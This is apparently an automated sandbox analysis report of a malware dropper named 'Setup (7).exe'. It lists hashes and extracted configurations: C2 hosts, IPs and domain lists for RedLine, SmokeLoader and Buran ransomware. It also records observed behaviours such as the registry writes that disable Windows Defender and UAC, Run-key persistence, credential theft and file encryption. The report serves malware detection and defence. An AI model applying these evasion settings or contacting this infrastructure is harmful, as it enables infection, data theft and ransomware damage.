Resubmissions
15-10-2024 15:36
241015-s1zlzasdkc 1001-07-2024 18:32
240701-w6yteawhmq 1001-07-2024 14:52
240701-r82wmaxdnd 1001-07-2024 14:52
240701-r8syqa1dpp 1011-03-2024 21:22
240311-z8dsssgg58 1001-09-2021 13:18
210901-5bmxjspa5s 1001-09-2021 13:04
210901-te4btfspqa 1001-09-2021 05:12
210901-4wnkwm1p3j 1031-08-2021 21:47
210831-41rp97dma2 1031-08-2021 19:51
210831-359awwatje 10Analysis
-
max time kernel
759s -
max time network
1819s -
platform
windows11_x64 -
resource
win11 -
submitted
27-08-2021 16:31
Static task
static1
Behavioral task
behavioral1
Sample
Setup (4).exe
Resource
win11
Behavioral task
behavioral2
Sample
Setup (5).exe
Resource
win11
Behavioral task
behavioral3
Sample
Setup (6).exe
Resource
win11
Behavioral task
behavioral4
Sample
Setup (7).exe
Resource
win11
Behavioral task
behavioral5
Sample
Setup (8).exe
Resource
win11
Behavioral task
behavioral6
Sample
Setup (9).exe
Resource
win11
Behavioral task
behavioral7
Sample
Setup.exe
Resource
win11
General
-
Target
Setup (7).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
https://kmsauto.us/ra/ALL.txt
Extracted
https://kmsauto.us/ALL.txt
Extracted
C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
buran
Extracted
redline
2608
tambisup.com:9825
Extracted
redline
dibild2
135.148.139.222:1494
Extracted
smokeloader
2020
http://readinglistforaugust1.xyz/
http://readinglistforaugust2.xyz/
http://readinglistforaugust3.xyz/
http://readinglistforaugust4.xyz/
http://readinglistforaugust5.xyz/
http://readinglistforaugust6.xyz/
http://readinglistforaugust7.xyz/
http://readinglistforaugust8.xyz/
http://readinglistforaugust9.xyz/
http://readinglistforaugust10.xyz/
http://readinglistforaugust1.site/
http://readinglistforaugust2.site/
http://readinglistforaugust3.site/
http://readinglistforaugust4.site/
http://readinglistforaugust5.site/
http://readinglistforaugust6.site/
http://readinglistforaugust7.site/
http://readinglistforaugust8.site/
http://readinglistforaugust9.site/
http://readinglistforaugust10.site/
http://readinglistforaugust1.club/
http://readinglistforaugust2.club/
http://readinglistforaugust3.club/
http://readinglistforaugust4.club/
http://readinglistforaugust5.club/
http://readinglistforaugust6.club/
http://readinglistforaugust7.club/
http://readinglistforaugust8.club/
http://readinglistforaugust9.club/
http://readinglistforaugust10.club/
Extracted
metasploit
windows/single_exec
Signatures
-
Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
-
Glupteba Payload 1 IoCs
resource yara_rule behavioral4/memory/3052-762-0x0000000002FB0000-0x00000000038D6000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1616 4780 rundll32.exe 9 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 18 IoCs
resource yara_rule behavioral4/memory/3792-312-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral4/memory/3820-320-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/3820-324-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral4/memory/2172-347-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/5144-358-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/5208-377-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/5540-384-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/6096-428-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/5900-407-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/1332-430-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/5208-445-0x0000000005300000-0x00000000058A6000-memory.dmp family_redline behavioral4/memory/4128-463-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/5020-476-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/1080-472-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/6096-510-0x0000000005570000-0x0000000005B16000-memory.dmp family_redline behavioral4/memory/5540-491-0x0000000004E90000-0x00000000054A8000-memory.dmp family_redline behavioral4/memory/1080-562-0x0000000005700000-0x0000000005CA6000-memory.dmp family_redline behavioral4/memory/5492-764-0x0000000005520000-0x0000000005B38000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 28 IoCs
description pid Process procid_target PID 4432 created 1388 4432 ZFjqdvUVGG4soKAHBCOsWL6w.exe 115 PID 2748 created 2108 2748 WerFault.exe 104 PID 2532 created 3928 2532 WerFault.exe 123 PID 1284 created 340 1284 WerFault.exe 90 PID 4604 created 668 4604 WerFault.exe 243 PID 6128 created 1612 6128 Jz7VtM0locwi5F4upWphwMwh.exe 110 PID 3268 created 2544 3268 WerFault.exe 608 PID 5616 created 5960 5616 WerFault.exe 190 PID 5548 created 132 5548 Jz7VtM0locwi5F4upWphwMwh.exe 194 PID 6024 created 5808 6024 WerFault.exe 215 PID 5256 created 4064 5256 WerFault.exe 224 PID 576 created 4968 576 WerFault.exe 430 PID 5448 created 3052 5448 WerFault.exe 96 PID 4428 created 2368 4428 WerFault.exe 472 PID 7164 created 3360 7164 WerFault.exe 298 PID 5688 created 6328 5688 WerFault.exe 333 PID 244 created 4240 244 WerFault.exe 336 PID 7404 created 3872 7404 WerFault.exe 345 PID 7464 created 3992 7464 cmd.exe 284 PID 7316 created 6400 7316 WerFault.exe 302 PID 6892 created 8052 6892 Nsuse6Bs42Jg34a5HyHe3clA.exe 379 PID 5216 created 72 5216 Jz7VtM0locwi5F4upWphwMwh.exe 320 PID 4836 created 2264 4836 WerFault.exe 216 PID 2992 created 6948 2992 WerFault.exe 587 PID 7400 created 3912 7400 WerFault.exe 509 PID 5484 created 1604 5484 Jz7VtM0locwi5F4upWphwMwh.exe 1008 PID 7376 created 5764 7376 WerFault.exe 596 PID 1760 created 7556 1760 WerFault.exe 599 -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 2056 created 4116 2056 svchost.exe 327 PID 2056 created 4116 2056 svchost.exe 327 -
Turns off Windows Defender SpyNet reporting 2 TTPs
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Nirsoft 1 IoCs
resource yara_rule behavioral4/memory/2172-414-0x0000000004F60000-0x0000000005578000-memory.dmp Nirsoft -
Vidar Stealer 3 IoCs
resource yara_rule behavioral4/memory/340-451-0x0000000002720000-0x00000000027BD000-memory.dmp family_vidar behavioral4/memory/2544-517-0x00000000025D0000-0x000000000266D000-memory.dmp family_vidar behavioral4/memory/1080-562-0x0000000005700000-0x0000000005CA6000-memory.dmp family_vidar -
Blocklisted process makes network request 8 IoCs
flow pid Process 121 5496 mshta.exe 123 2004 mshta.exe 591 2264 powershell.exe 777 2264 powershell.exe 781 7196 cmd.exe 786 2264 powershell.exe 1606 7196 cmd.exe 1724 2264 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
pid Process 804 Nsuse6Bs42Jg34a5HyHe3clA.exe 668 S3CRqe36iff2_Nv6VBKbQpQw.exe 592 RJdm3ls_W_5VxM1V2T9DXdH0.exe 700 y8CjKi3AYSnoDbR9Q1TJtwob.exe 3000 B8EAiQM0r0gOaZgQvIQDDAyE.exe 3052 ThuseeB9VMpA_ss9wUX0wqa6.exe 3056 yklip9lLUdwW3N17zW8e9dl0.exe 968 7r8eheenr48ifSwYOruBNk3H.exe 4772 6ISgl_BtDTv9hSzZx6SmrqBl.exe 340 m21dPxSXvr2n3Za8XSXjPJgV.exe 860 Q2I2YzAMB_JBSO1VLoIrLXer.exe 1136 ZFjqdvUVGG4soKAHBCOsWL6w.exe 1288 114ea3iZuW8lGHU596f7SwEr.exe 1672 j0sUeBlDf1wxCAeeqZqYWjvc.exe 1692 jAkEf6fFJtpWep78XXvMZnjX.exe 1612 F5yFWE1LUrF6bRZvC7tK_NaV.exe 1820 fvb8NG4vNomxEhKkfbBUqv26.exe 2056 svchost.exe 2108 ruGjMJliWgX5nR0pm0TwFFCX.exe 2544 bfd4L5Z4LBZHBpciPielEr_1.exe 1520 U0zKDM0y1pVnqxjsOi3SDxEd.exe 2272 Jz7VtM0locwi5F4upWphwMwh.exe 1388 o2dobHH61A0I_mrTH1VIjxMA.exe 4564 h9h_NpkpM446vmWTnqNXfbIA.exe 3480 HcoG3_mfZG59xXZ79oX3hhty.exe 2092 2j_km2DuQ1MuXjIYLHc6KD_q.exe 4988 Hj5Kn3mRnEpDSSdr268Dcs8R.exe 5060 cutm3.exe 2352 md8_8eus.exe 1572 inst1.exe 3928 Ou3tPfureT.exe 4116 Nsuse6Bs42Jg34a5HyHe3clA.exe 3032 5QJ2f9SU.com 3820 Nsuse6Bs42Jg34a5HyHe3clA.exe 5052 Jz7VtM0locwi5F4upWphwMwh.exe 5392 INzzFcp2.com 2172 ZFjqdvUVGG4soKAHBCOsWL6w.exe 5144 Nsuse6Bs42Jg34a5HyHe3clA.exe 5832 Bx0IuOFB.ExE 5936 RPCM5VdB.com 5208 Jz7VtM0locwi5F4upWphwMwh.exe 5540 ZFjqdvUVGG4soKAHBCOsWL6w.exe 5900 Nsuse6Bs42Jg34a5HyHe3clA.exe 6096 Jz7VtM0locwi5F4upWphwMwh.exe 1332 ZFjqdvUVGG4soKAHBCOsWL6w.exe 4844 Conhost.exe 4128 ZFjqdvUVGG4soKAHBCOsWL6w.exe 1080 Jz7VtM0locwi5F4upWphwMwh.exe 5020 Nsuse6Bs42Jg34a5HyHe3clA.exe 4472 RJdm3ls_W_5VxM1V2T9DXdH0.exe 4432 ZFjqdvUVGG4soKAHBCOsWL6w.exe 132 KU6UUiwSos.exe 5472 Jz7VtM0locwi5F4upWphwMwh.exe 5920 Nsuse6Bs42Jg34a5HyHe3clA.exe 1524 Jz7VtM0locwi5F4upWphwMwh.exe 1468 ZFjqdvUVGG4soKAHBCOsWL6w.exe 5916 ZFjqdvUVGG4soKAHBCOsWL6w.exe 4256 Jz7VtM0locwi5F4upWphwMwh.exe 1940 ZFjqdvUVGG4soKAHBCOsWL6w.exe 1804 Nsuse6Bs42Jg34a5HyHe3clA.exe 3708 Jz7VtM0locwi5F4upWphwMwh.exe 4968 ZFjqdvUVGG4soKAHBCOsWL6w.exe 5084 Q2I2YzAMB_JBSO1VLoIrLXer.exe 2328 Nsuse6Bs42Jg34a5HyHe3clA.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion yklip9lLUdwW3N17zW8e9dl0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion yklip9lLUdwW3N17zW8e9dl0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2j_km2DuQ1MuXjIYLHc6KD_q.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2j_km2DuQ1MuXjIYLHc6KD_q.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion h9h_NpkpM446vmWTnqNXfbIA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion h9h_NpkpM446vmWTnqNXfbIA.exe -
Loads dropped DLL 2 IoCs
pid Process 5960 rundll32.exe 3976 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral4/files/0x000200000002b1dc-174.dat themida behavioral4/files/0x000200000002b1eb-216.dat themida behavioral4/files/0x000200000002b1e8-220.dat themida behavioral4/files/0x000200000002b1dc-244.dat themida behavioral4/files/0x000200000002b1e8-245.dat themida behavioral4/files/0x000200000002b1eb-240.dat themida behavioral4/memory/2092-313-0x0000000000660000-0x0000000000661000-memory.dmp themida behavioral4/memory/3056-311-0x00000000008F0000-0x00000000008F1000-memory.dmp themida -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" jAkEf6fFJtpWep78XXvMZnjX.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" jAkEf6fFJtpWep78XXvMZnjX.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" jAkEf6fFJtpWep78XXvMZnjX.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features ZFjqdvUVGG4soKAHBCOsWL6w.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Documents\jAkEf6fFJtpWep78XXvMZnjX.exe = "0" jAkEf6fFJtpWep78XXvMZnjX.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection jAkEf6fFJtpWep78XXvMZnjX.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" jAkEf6fFJtpWep78XXvMZnjX.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features jAkEf6fFJtpWep78XXvMZnjX.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection Nsuse6Bs42Jg34a5HyHe3clA.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths jAkEf6fFJtpWep78XXvMZnjX.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions jAkEf6fFJtpWep78XXvMZnjX.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet jAkEf6fFJtpWep78XXvMZnjX.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run Nsuse6Bs42Jg34a5HyHe3clA.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\smss.exe\" -start" Nsuse6Bs42Jg34a5HyHe3clA.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA yklip9lLUdwW3N17zW8e9dl0.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2j_km2DuQ1MuXjIYLHc6KD_q.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA h9h_NpkpM446vmWTnqNXfbIA.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jAkEf6fFJtpWep78XXvMZnjX.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" jAkEf6fFJtpWep78XXvMZnjX.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\N: ZFjqdvUVGG4soKAHBCOsWL6w.exe File opened (read-only) \??\R: Nsuse6Bs42Jg34a5HyHe3clA.exe File opened (read-only) \??\I: Nsuse6Bs42Jg34a5HyHe3clA.exe File opened (read-only) \??\R: ZFjqdvUVGG4soKAHBCOsWL6w.exe File opened (read-only) \??\F: ZFjqdvUVGG4soKAHBCOsWL6w.exe File opened (read-only) \??\A: ZFjqdvUVGG4soKAHBCOsWL6w.exe File opened (read-only) \??\P: Nsuse6Bs42Jg34a5HyHe3clA.exe File opened (read-only) \??\K: Nsuse6Bs42Jg34a5HyHe3clA.exe File opened (read-only) \??\H: Nsuse6Bs42Jg34a5HyHe3clA.exe File opened (read-only) \??\W: ZFjqdvUVGG4soKAHBCOsWL6w.exe File opened (read-only) \??\O: Nsuse6Bs42Jg34a5HyHe3clA.exe File opened (read-only) \??\A: Nsuse6Bs42Jg34a5HyHe3clA.exe File opened (read-only) \??\Z: ZFjqdvUVGG4soKAHBCOsWL6w.exe File opened (read-only) \??\S: ZFjqdvUVGG4soKAHBCOsWL6w.exe File opened (read-only) \??\M: ZFjqdvUVGG4soKAHBCOsWL6w.exe File opened (read-only) \??\Z: Nsuse6Bs42Jg34a5HyHe3clA.exe File opened (read-only) \??\L: Nsuse6Bs42Jg34a5HyHe3clA.exe File opened (read-only) \??\F: Nsuse6Bs42Jg34a5HyHe3clA.exe File opened (read-only) \??\Y: ZFjqdvUVGG4soKAHBCOsWL6w.exe File opened (read-only) \??\X: ZFjqdvUVGG4soKAHBCOsWL6w.exe File opened (read-only) \??\L: ZFjqdvUVGG4soKAHBCOsWL6w.exe File opened (read-only) \??\X: Nsuse6Bs42Jg34a5HyHe3clA.exe File opened (read-only) \??\V: Nsuse6Bs42Jg34a5HyHe3clA.exe File opened (read-only) \??\J: Nsuse6Bs42Jg34a5HyHe3clA.exe File opened (read-only) \??\Q: Nsuse6Bs42Jg34a5HyHe3clA.exe File opened (read-only) \??\E: Nsuse6Bs42Jg34a5HyHe3clA.exe File opened (read-only) \??\V: ZFjqdvUVGG4soKAHBCOsWL6w.exe File opened (read-only) \??\U: ZFjqdvUVGG4soKAHBCOsWL6w.exe File opened (read-only) \??\P: ZFjqdvUVGG4soKAHBCOsWL6w.exe File opened (read-only) \??\J: ZFjqdvUVGG4soKAHBCOsWL6w.exe File opened (read-only) \??\W: Nsuse6Bs42Jg34a5HyHe3clA.exe File opened (read-only) \??\T: Nsuse6Bs42Jg34a5HyHe3clA.exe File opened (read-only) \??\T: ZFjqdvUVGG4soKAHBCOsWL6w.exe File opened (read-only) \??\K: ZFjqdvUVGG4soKAHBCOsWL6w.exe File opened (read-only) \??\H: ZFjqdvUVGG4soKAHBCOsWL6w.exe File opened (read-only) \??\U: Nsuse6Bs42Jg34a5HyHe3clA.exe File opened (read-only) \??\S: Nsuse6Bs42Jg34a5HyHe3clA.exe File opened (read-only) \??\B: Nsuse6Bs42Jg34a5HyHe3clA.exe File opened (read-only) \??\Y: Nsuse6Bs42Jg34a5HyHe3clA.exe File opened (read-only) \??\N: Nsuse6Bs42Jg34a5HyHe3clA.exe File opened (read-only) \??\Q: ZFjqdvUVGG4soKAHBCOsWL6w.exe File opened (read-only) \??\O: ZFjqdvUVGG4soKAHBCOsWL6w.exe File opened (read-only) \??\I: ZFjqdvUVGG4soKAHBCOsWL6w.exe File opened (read-only) \??\G: ZFjqdvUVGG4soKAHBCOsWL6w.exe File opened (read-only) \??\E: ZFjqdvUVGG4soKAHBCOsWL6w.exe File opened (read-only) \??\B: ZFjqdvUVGG4soKAHBCOsWL6w.exe File opened (read-only) \??\M: Nsuse6Bs42Jg34a5HyHe3clA.exe File opened (read-only) \??\G: Nsuse6Bs42Jg34a5HyHe3clA.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ipinfo.io 29 ipinfo.io 42 ip-api.com 101 ipinfo.io 411 geoiptool.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 2092 2j_km2DuQ1MuXjIYLHc6KD_q.exe 3056 yklip9lLUdwW3N17zW8e9dl0.exe 4564 h9h_NpkpM446vmWTnqNXfbIA.exe -
Suspicious use of SetThreadContext 64 IoCs
description pid Process procid_target PID 3928 set thread context of 3792 3928 Ou3tPfureT.exe 139 PID 804 set thread context of 3820 804 Nsuse6Bs42Jg34a5HyHe3clA.exe 133 PID 1136 set thread context of 2172 1136 ZFjqdvUVGG4soKAHBCOsWL6w.exe 144 PID 804 set thread context of 5144 804 Nsuse6Bs42Jg34a5HyHe3clA.exe 146 PID 2272 set thread context of 5208 2272 Jz7VtM0locwi5F4upWphwMwh.exe 151 PID 1136 set thread context of 5540 1136 ZFjqdvUVGG4soKAHBCOsWL6w.exe 149 PID 804 set thread context of 5900 804 Nsuse6Bs42Jg34a5HyHe3clA.exe 506 PID 2272 set thread context of 6096 2272 Jz7VtM0locwi5F4upWphwMwh.exe 167 PID 1136 set thread context of 1332 1136 ZFjqdvUVGG4soKAHBCOsWL6w.exe 170 PID 1136 set thread context of 4128 1136 ZFjqdvUVGG4soKAHBCOsWL6w.exe 179 PID 2272 set thread context of 1080 2272 Jz7VtM0locwi5F4upWphwMwh.exe 175 PID 804 set thread context of 5020 804 Nsuse6Bs42Jg34a5HyHe3clA.exe 180 PID 592 set thread context of 4472 592 RJdm3ls_W_5VxM1V2T9DXdH0.exe 185 PID 1136 set thread context of 4432 1136 ZFjqdvUVGG4soKAHBCOsWL6w.exe 184 PID 2272 set thread context of 5472 2272 Jz7VtM0locwi5F4upWphwMwh.exe 189 PID 804 set thread context of 5920 804 Nsuse6Bs42Jg34a5HyHe3clA.exe 187 PID 1136 set thread context of 1468 1136 ZFjqdvUVGG4soKAHBCOsWL6w.exe 201 PID 1692 set thread context of 6140 1692 jAkEf6fFJtpWep78XXvMZnjX.exe 423 PID 2272 set thread context of 4256 2272 Jz7VtM0locwi5F4upWphwMwh.exe 206 PID 132 set thread context of 5788 132 KU6UUiwSos.exe 220 PID 1136 set thread context of 1940 1136 ZFjqdvUVGG4soKAHBCOsWL6w.exe 207 PID 804 set thread context of 1804 804 Nsuse6Bs42Jg34a5HyHe3clA.exe 208 PID 2272 set thread context of 3708 2272 Jz7VtM0locwi5F4upWphwMwh.exe 210 PID 860 set thread context of 5084 860 Q2I2YzAMB_JBSO1VLoIrLXer.exe 225 PID 1136 set thread context of 4064 1136 ZFjqdvUVGG4soKAHBCOsWL6w.exe 224 PID 1820 set thread context of 4012 1820 fvb8NG4vNomxEhKkfbBUqv26.exe 229 PID 2272 set thread context of 5808 2272 Jz7VtM0locwi5F4upWphwMwh.exe 215 PID 804 set thread context of 4968 804 Nsuse6Bs42Jg34a5HyHe3clA.exe 430 PID 1136 set thread context of 5492 1136 ZFjqdvUVGG4soKAHBCOsWL6w.exe 231 PID 2272 set thread context of 5240 2272 Jz7VtM0locwi5F4upWphwMwh.exe 235 PID 804 set thread context of 3396 804 Nsuse6Bs42Jg34a5HyHe3clA.exe 241 PID 2272 set thread context of 5420 2272 Jz7VtM0locwi5F4upWphwMwh.exe 248 PID 1136 set thread context of 6168 1136 ZFjqdvUVGG4soKAHBCOsWL6w.exe 249 PID 1672 set thread context of 6604 1672 j0sUeBlDf1wxCAeeqZqYWjvc.exe 473 PID 1136 set thread context of 6656 1136 ZFjqdvUVGG4soKAHBCOsWL6w.exe 257 PID 2272 set thread context of 6700 2272 Jz7VtM0locwi5F4upWphwMwh.exe 259 PID 804 set thread context of 6680 804 Nsuse6Bs42Jg34a5HyHe3clA.exe 260 PID 2272 set thread context of 6972 2272 Jz7VtM0locwi5F4upWphwMwh.exe 265 PID 804 set thread context of 1396 804 Nsuse6Bs42Jg34a5HyHe3clA.exe 268 PID 1136 set thread context of 4528 1136 ZFjqdvUVGG4soKAHBCOsWL6w.exe 918 PID 2272 set thread context of 3728 2272 Jz7VtM0locwi5F4upWphwMwh.exe 267 PID 804 set thread context of 6320 804 Nsuse6Bs42Jg34a5HyHe3clA.exe 271 PID 2272 set thread context of 6372 2272 Jz7VtM0locwi5F4upWphwMwh.exe 273 PID 1136 set thread context of 1512 1136 ZFjqdvUVGG4soKAHBCOsWL6w.exe 272 PID 804 set thread context of 3816 804 Nsuse6Bs42Jg34a5HyHe3clA.exe 274 PID 2272 set thread context of 3304 2272 Jz7VtM0locwi5F4upWphwMwh.exe 275 PID 804 set thread context of 5592 804 Nsuse6Bs42Jg34a5HyHe3clA.exe 277 PID 1136 set thread context of 2368 1136 ZFjqdvUVGG4soKAHBCOsWL6w.exe 472 PID 1136 set thread context of 3732 1136 ZFjqdvUVGG4soKAHBCOsWL6w.exe 280 PID 804 set thread context of 3592 804 Nsuse6Bs42Jg34a5HyHe3clA.exe 936 PID 2272 set thread context of 6880 2272 Jz7VtM0locwi5F4upWphwMwh.exe 279 PID 804 set thread context of 3760 804 Nsuse6Bs42Jg34a5HyHe3clA.exe 286 PID 2272 set thread context of 3360 2272 Jz7VtM0locwi5F4upWphwMwh.exe 298 PID 1136 set thread context of 5272 1136 ZFjqdvUVGG4soKAHBCOsWL6w.exe 297 PID 804 set thread context of 5568 804 Nsuse6Bs42Jg34a5HyHe3clA.exe 783 PID 1136 set thread context of 4640 1136 ZFjqdvUVGG4soKAHBCOsWL6w.exe 292 PID 2272 set thread context of 4268 2272 Jz7VtM0locwi5F4upWphwMwh.exe 299 PID 1136 set thread context of 6688 1136 ZFjqdvUVGG4soKAHBCOsWL6w.exe 305 PID 2272 set thread context of 4936 2272 Jz7VtM0locwi5F4upWphwMwh.exe 307 PID 1136 set thread context of 4056 1136 ZFjqdvUVGG4soKAHBCOsWL6w.exe 308 PID 804 set thread context of 3020 804 Nsuse6Bs42Jg34a5HyHe3clA.exe 306 PID 2272 set thread context of 5548 2272 Jz7VtM0locwi5F4upWphwMwh.exe 310 PID 1136 set thread context of 5724 1136 ZFjqdvUVGG4soKAHBCOsWL6w.exe 313 PID 804 set thread context of 6856 804 Nsuse6Bs42Jg34a5HyHe3clA.exe 315 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Slipstream.xml smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Trial-ppd.xrm-ms WerFault.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Subscription-ul-oob.xrm-ms WerFault.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelVL_KMS_Client-ppd.xrm-ms WerFault.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp3-ppd.xrm-ms smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentDemoR_BypassTrial180-ul-oob.xrm-ms WerFault.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Corbel.xml WerFault.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.PowerView.PowerView.x-none.msi.16.x-none.xml WerFault.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Retail-pl.xrm-ms smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Grace-ul-oob.xrm-ms smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Retail-ppd.xrm-ms WerFault.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml.payfast290.35E-E0D-55E WerFault.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Glossy.eftx smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019VL_KMS_Client_AE-ppd.xrm-ms smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_Trial-ppd.xrm-ms smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail3-ul-oob.xrm-ms WerFault.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019VL_MAK_AE-ul-phn.xrm-ms WerFault.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp4-ul-oob.xrm-ms WerFault.exe File created C:\Program Files\Microsoft Office\root\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT smss.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Marquee.xml.payfast290.35E-E0D-55E WerFault.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Franklin Gothic.xml WerFault.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Extreme Shadow.eftx WerFault.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Top Shadow.eftx WerFault.exe File opened for modification 